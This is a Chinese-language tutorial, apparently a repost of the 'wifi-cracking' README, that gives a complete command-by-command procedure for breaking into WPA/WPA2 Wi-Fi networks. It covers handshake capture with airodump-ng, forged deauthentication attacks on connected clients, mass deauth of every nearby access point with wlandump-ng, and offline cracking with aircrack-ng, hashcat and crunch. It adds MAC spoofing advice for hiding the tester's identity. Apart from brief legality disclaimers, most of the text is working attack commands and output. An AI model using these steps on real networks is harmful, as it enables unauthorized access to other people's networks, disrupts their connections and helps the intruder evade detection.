使用 Airodump-ng 与 Aircrack-ng/Hashcat 破解 WPA/WPA2 无线网络:完整实战指南 教程网络安全渗透测试【免费下载链接】wifi-crackingCrack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat项目地址https://gitcode.com/gh_mirrors/wi/wifi-cracking点击查看免费下载本文是 wifi-cracking 仓库README.md的深度技术解读。它完整演示了一条从启用无线网卡监听模式、扫描目标网络、捕获 WPA/WPA2 四次握手4-way handshake到最终破解网络密码的实战链路覆盖 Aircrack-ng 套件airmon-ng、airodump-ng、aireplay-ng、aircrack-ng与 Hashcat/naive-hashcat 两种破解路线并深入解析可选的 Deauth解除认证主动加速攻击。阅读本文后你将能够在自己拥有合法权限的网络环境中独立完成一次从侦察到破解的完整安全测试并掌握wlandump-ng、crunch、macchanger等进阶配套工具的使用方法。免责声明本教程仅用于教育与安全研究目的严禁用于任何非法活动。作者不对其被滥用承担责任——请只对你自己拥有或已获授权的网络进行测试。教程定位与仓库结构本教程源自 README.md它定位为简洁但完整的入门走查攻击路线以完全被动监听为主只收听、不发包只要你不实际使用破解出的密码该行为就无法被探测到并将可选的主动 Deauth 攻击作为加速手段放在教程末尾单独讲解。仓库整体由纯文档构成便于对照阅读README.md主教程本文所依据的英文原版README.zh.md主教程的中文翻译appendix.md主教程的补充附录macOS 破解、wlandump-ng、crunch、macchangerappendix.zh.md附录的中文翻译CHANGELOG.md版本演进记录1.0 原始教程 → 1.1 加入附录 → 1.2 加入 macOS 支持 → 1.3 加入中文版 → 1.4 中文版更新LICENSEMIT 协议Copyright (c) 2017 Brannon Dorsey前置条件你需要准备什么开始之前请确认以下四项前提缺一不可命令行操作熟练——整个流程全部在终端中完成涉及多个前台进程与多终端协作。基于 Debian 的 Linux 发行版推荐 [Kali Linux]Kali 预装了无线渗透所需的绝大多数工具。macOS 用户请参考仓库附录 appendix.md 中的替代方案。已安装 Aircrack-ng 套件在 Debian 系发行版上执行sudo apt-get install aircrack-ng一块支持监听模式Monitor Mode的无线网卡。监听模式允许网卡捕获空中所有 802.11 帧而不仅仅是发给自己的帧这是整个被动攻击的技术基础。绝大多数笔记本内置网卡并不支持通常需要外接 USB 无线网卡。原理速览为什么 WPA/WPA2 可以这样被破解WPA/WPA2个人模式即 WPA-PSK/WPA2-PSK使用**四次握手4-way handshake**来完成设备与接入点AP之间的认证。当一台设备加入网络时AP 与客户端会交换 4 条 EAPOL 消息协商出会话密钥。这个握手过程可以被旁观者完整捕获——而密码破解的关键在于握手数据中蕴含的信息足以让攻击者在离线状态下暴力尝试密码。也就是说破解流程本质上分两步捕获等一个真实设备连接目标网络把它的四次握手数据包存进.cap抓包文件这就是为什么攻击可以是完全被动的。离线破解用捕获的握手数据结合字典/规则/掩码攻击在本地CPU 或 GPU穷举可能的密码逐一验证是否与握手匹配。只要目标网络使用弱密码整个过程就不需要对 AP 发送任何东西唯一需要主动的时刻是当你等不及设备自然重连、想用 Deauth 攻击逼它快速重连时见下文专门章节。第一步启用监听模式1.1 检查网卡是否支持监听模式运行airmon-ng如果输出中列出了无线接口说明你的网卡支持监听模式如果没有任何接口列出则此教程对你不可用。1.2 将接口切换到监听模式假设你的无线接口名为wlan0请务必以实际输出为准替换airmon-ng start wlan0执行后运行iwconfig验证应能看到一个新的监听模式接口常见命名为mon0或wlan0mon。后续所有抓包命令都使用这个监听接口而不是原始的wlan0。第二步发现目标网络使用监听接口扫描附近由路由器周期性广播的802.11 Beacon 帧airodump-ng mon0你将看到类似下面的实时扫描表CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP length: 0 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlins Awesome 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca扫描表的关键列列名含义本次演示取值BSSID接入点的 MAC 地址9C:5C:8E:C9:AB:C0PWR接收信号强度dBm绝对值越小信号越强-81CH信道号后续定向监听必须用到3ENC/CIPHER/AUTH加密类型 / 密码套件 / 认证方式WPA2/CCMP/PSKESSID网络名称hackme注意目标网络hackme在表中显示CH为 3但在后续定向抓包示例中同一 BSSID 又出现在信道 6 上——信道数值可能因环境如 AP 自动选频而漂移务必以airodump-ng实时显示的当前信道为准。选定目标后记下它的BSSID与CH进入下一步。第三步捕获四次握手3.1 定向监听目标网络把扫描器锁定到目标 BSSID 与信道并将抓包文件写入指定目录# 将 -c 与 --bssid 替换为目标网络的真实值 # -w 指定抓包文件的保存目录 airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0此时屏幕只显示该目标网络的定向视图CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS3.2 等待握手出现接下来就是等待每当有设备例如邻居下班回家后手机自动重连接入目标网络四次握手就会发生并被捕获。屏幕右上角、当前时间右侧出现类似[ WPA handshake: bc:d3:c9:ef:d2:67的提示时说明握手已到手。如果你不想被动等待可以跳到文末的 Deauth 攻击 章节用主动方式迫使客户端重连以加速握手捕获。3.3 保存并整理抓包文件捕获成功后按Ctrl-C退出airodump-ng。在-w指定的目录下会生成.cap抓包文件通常命名为-01.cap。建议把它重命名为目标网络名便于管理mv ./-01.cap hackme.cap第四步破解网络密码拿到握手后破解手段有两条路线GPU 路线强烈推荐hashcat/naive-hashcat速度快几个数量级CPU 路线aircrack-ng字典攻击简单但慢。无论哪条路线都需要先明确一个现实前提两种攻击方法都假设目标使用弱密码。如今大多数 WPA/WPA2 路由器出厂自带 12 位随机强密码且多数用户不会去改。如果你面对的是这类密码建议使用专门收集的真实 WPA 长度字典例如 Probable-Wordlists 的 WPA-Length 词表来提高命中率。4.1 路线一推荐naive-hashcat GPU转换格式cap → hccapxHashcat 需要专有的.hccapx格式。转换有两种方式将.cap上传到在线转换服务或使用cap2hccapx工具来自 hashcat-utilscap2hccapx.bin hackme.cap hackme.hccapx下载并运行 naive-hashcatnaive-hashcat是作者为简化 hashcat 使用而封装的脚本工具自动组合字典、规则、组合与掩码智能暴力等多种攻击模式# 下载 naive-hashcat git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # 下载 134MB 的 rockyou 字典文件 curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # 开始破解 # 2500 是 hashcat 中 WPA/WPA2 的哈希模式编号 HASH_FILEhackme.hccapx POT_FILEhackme.pot HASH_TYPE2500 ./naive-hashcat.sh三个环境变量的含义变量含义本次取值HASH_FILE待破解的.hccapx文件hackme.hccapxPOT_FILE破解结果输出文件potfilehackme.potHASH_TYPEhashcat 哈希模式WPA/WPA2 固定为25002500由于组合了多种攻击模式对中等强度密码的破解可能持续数天甚至数月因此要定期查看 pot 文件进度。破解成功后POT_FILE内容形如e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet该行以:分隔其中最后两个字段分别是网络名称与明文密码ASUS与hacktheplanet前面的字段依次是 PMKID/握手哈希与 AP MAC、客户端 MAC 等元数据。若想绕过 naive-hashcat 直接使用原生 hashcat可参考 hashcat 官方 WPA/WPA2 破解文档自行配置。4.2 路线二Aircrack-ng CPU 字典攻击aircrack-ng可在纯 CPU 上执行最基本的字典攻击。先准备字典——推荐经典的 rockyoucurl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt关键限制如果网络密码不在字典文件中将永远无法破解成功。字典攻击的命中率完全取决于词表覆盖度。执行攻击# -a2 指定 WPA/WPA2 攻击模式-b 指定 BSSID-w 指定字典文件 aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap破解成功时终端会出现KEY FOUND!提示与明文密码并打印出派生的密钥材料完整输出示例Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ hacktheplanet ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4其中keys tested是已尝试的候选密码数k/s是当前破解速度这两项用于估算剩余时间。Master Key、Transient Key、EAPOL HMAC是四次握手推导出的会话密钥材料供取证与协议分析使用。Deauth 攻击强制触发握手这是教程中唯一的主动环节用于在目标客户端迟迟不重连时人为制造四次握手。原理攻击者向已连接目标网络的客户端发送伪造的解除认证deauthentication数据包数据包中的伪造发送方地址会让客户端误以为是 AP 发来的于是客户端断开网络并立即重连——而这一重连过程恰好产生四次握手正被旁边监听的airodump-ng捕获。5.1 找到在线客户端先用定向监听找到目标 AP 下的在线客户端STATIONairodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 mon0当屏幕下方出现STATION列表时即说明有客户端在线CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS BSSID STATION PWR Rate Lost Frames Probe 9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS本例中客户端 MAC 为64:BC:0C:48:97:F7。5.2 发送伪造 Deauth 包保持airodump-ng监听不中断另开一个终端执行aireplay-ng定向踢掉该客户端# -0 2 表示发送 2 个 deauth 包如需可增大该数值 # 但会明显中断客户端的网络活动存在被察觉的风险 # -a 为接入点 MAC # -c 为客户端 MAC aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0也可以选择对目标 AP 的全部客户端广播 deauth# 注意并非所有客户端都会响应广播式 deauth aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0发送完成后回到airodump-ng窗口若成功右上角会出现[ WPA handshake: 9C:5C:8E:C9:AB:C0。此时即可按Ctrl-C保存抓包并进入 破解密码 环节。全流程命令速查表以下命令按执行顺序排列来自 README.md 的原文归纳覆盖从监听模式到破解完成的完整链路# 将无线设备置入监听模式 airmon-ng start wlan0 # 扫描附近所有 beacon 帧获取目标 BSSID 与信道 airodump-ng mon0 # 开始定向监听四次握手 airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0 # 可选踢掉在线客户端以强制触发握手 aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0 ########## 用 aircrack-ng 破解密码... ########## # 如需要下载 134MB 的 rockyou.txt 字典 curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # 用 aircrack-ng 破解 aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap ########## 或用 naive-hashcat 破解密码 ########## # 将 cap 转换为 hccapx cap2hccapx.bin capture/-01.cap capture/-01.hccapx # 用 naive-hashcat 破解 HASH_FILEhackme.hccapx POT_FILEhackme.pot HASH_TYPE2500 ./naive-hashcat.sh进阶技巧仓库附录精华仓库附录 appendix.md中文版收录了社区贡献的四个进阶方案均由原作者验证或社区 PR 引入版本记录见 CHANGELOG.md。7.1 macOS 上的替代路线OSX 自带无线诊断工具即可完成握手捕获按住 Option 键点击菜单栏 Wi-Fi 图标 → 打开无线诊断→ 用Window 扫描确定目标信道与带宽再用Window 嗅探器选择信道开始抓包待设备重连捕获握手后点 Stop生成的.wcap文件位于桌面或/var/tmp/将其上传转换即可得到.hccapx。之后在 macOS 上从源码构建 hashcat 并运行 naive-hashcatgit clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # 在 macOS 上从源码构建 hashcat ./build-hashcat-osx.sh # 下载 134MB 的 rockyou 字典 curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt最后运行handshake.hccapx换成实际下载的文件名cracked.pot为输出文件HASH_FILEhandshake.hccapx POT_FILEcracked.pot HASH_TYPE2500 ./naive-hashcat.sh该方法已在 OSX 10.10 与 10.12、2012 与 2015 款 MacBook Pro 上验证可用。7.2wlandump-ng批量捕获周边所有网络wlandump-ng属于 hashcat 生态的 hcxtools 工具集相对airodump-ng的优势是可在信道间跳频、一次性捕获周围所有网络的握手# 克隆并编译安装 hcxtools需先 apt 安装依赖 git clone https://github.com/ZerBea/hcxtools cd hcxtools make sudo make install # 批量踢掉附近所有 AP 的在线客户端并监听重连握手 # 将 wlan0 替换为你的无线设备名 wlandump-ng -i wlan0 -o capture.cap -c 1 -t 60 -d 100 -D 10 -m 512 -b -r -s 20 # 转换为 hashcat 格式 cap2hccapx.bin capture.cap capture.hccapx主要参数一览完整列表可用-h查看参数作用示例值-c 1从 2.4GHz 信道 1 开始扫描会递增到 131-t 60每个信道停留秒数默认5可实验更低值60-d 100每收到 100 个 beacon 帧发送一次 deauth100-D 10每 10 个 beacon 帧发送一次 disassociation10-m 512内部环形缓冲区大小低配机器用 512512-b激活对最近 10 个 probe 请求的 beacon 响应—-r跳频回到信道 1 时重置 deauth/disassoc 计数器—-s 20显示 20 行状态信息20wlandump-ng也支持纯被动模式-p完全不发送任何 deauth/disassociation 帧代价是捕获握手数量大幅减少但整个监听不可被探测# 被动模式默认设置运行 wlandump-ng -i wlan0 -o capture.cap -p -s 20警告主动使用wlandump-ng在大多数地区很可能违法请务必仅在你的合法测试环境中使用。7.3crunch即时生成超大字典crunch按指定字符集与长度组合生成字典可通过管道直接喂给aircrack-ng无需在磁盘上落盘整个词表sudo apt-get install crunch先体验一下它的工作方式密码开始刷屏后按Ctrl-C停止# 两个 8 分别为生成密码的最小/最大长度 # 0123456789 是参与组合/排列的字符集 crunch 8 8 0123456789它会在启动时预告数据规模随后逐行输出候选密码Crunch will now generate the following amount of data: 900000000 bytes 858 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 100000000 00000000 00000001 00000002 00000003 00000004 00000005 00000006 00000007 00000008 00000009 ... 99999999将其输出管道给aircrack-ng即成为流式字典。下面的命令使用crunch模式字符%表示数字当场生成全部 10 位数字组合来破解10 位电话号码型密码约 102GB 数据量# -t ^%, 可自定义模式 替换为小写字母、, 替换为大写字母、 # % 替换为数字、^ 替换为特殊字符 # *************** 管道末尾的 - 表示从标准输入读取字典 crunch 10 10 -t %%%%%%%%%% | aircrack-ng -a2 capture.cap -b 58:98:35:CB:A2:77 -w -7.4macchanger保护你的身份任何涉及 Wi-Fi 的敏感测试都建议先更换无线网卡的 MAC 地址避免真实设备序列被关联到你的身份。操作步骤如下# 安装 sudo apt-get install macchanger # 先关闭设备 sudo ifconfig wlan0 down # 更换 MAC # -A 随机生成一个带有效厂商前缀的 MAC # -r 生成完全随机 MAC # -p 恢复为出厂硬件 MAC sudo macchanger -A wlan0 # 重新启用设备 sudo ifconfig wlan0 up实操建议若有多张网卡最好全部处理或在抓握手时直接关闭不使用的无线接口尽可能少留痕迹。注意MAC 伪装的修改在重启后不保留。安全边界与合法性最后再次强调 README.md 原文的立场本教程的默认攻击路径是完全被动的只监听、不广播只要不使用破解出的密码攻击本身无法被探测Deauth 攻击与wlandump-ng主动模式属于主动攻击会真实干扰目标网络中的客户端连接在多数司法辖区未授权使用即为违法请将本文所有技术仅用于你自己拥有的网络、或已获得明确书面授权的渗透测试项目。无论是验证自家路由器的弱口令风险还是完成授权的无线安全评估掌握本文这套Airodump-ng 捕获握手 Hashcat/Aircrack-ng 离线破解的方法论都是无线安全入门最扎实的第一步。赞分享教程网络安全渗透测试【免费下载链接】wifi-crackingCrack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat项目地址https://gitcode.com/gh_mirrors/wi/wifi-cracking点击查看免费下载相关推荐目标网络精准定位使用airodump-ng发现WPA/WPA2漏洞网络目标网络精准定位使用airodump ng发现WPA/WPA2漏洞网络 想要发现周围的WPA/WPA2漏洞网络吗airodump ng工具能帮你精准定位存在教程网络安全渗透测试终极WPA/WPA2安全评估指南掌握aircrack-ng高级测试技巧想要 快速掌握WPA/WPA2 PSK安全测试 的完整流程吗aircrack ng作为业界领先的WiFi安全审计工具套件为您提供了一整套专业的无线网络安全测网络安全渗透测试应用安全深入WiFi安全分析核心Airodump-ng与Aircrack-ng实战指南深入WiFi安全分析核心Airodump ng与Aircrack ng实战指南 本文深入探讨了无线网络安全评估中的核心技术重点介绍了Airodump ng工教程网络安全渗透测试创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考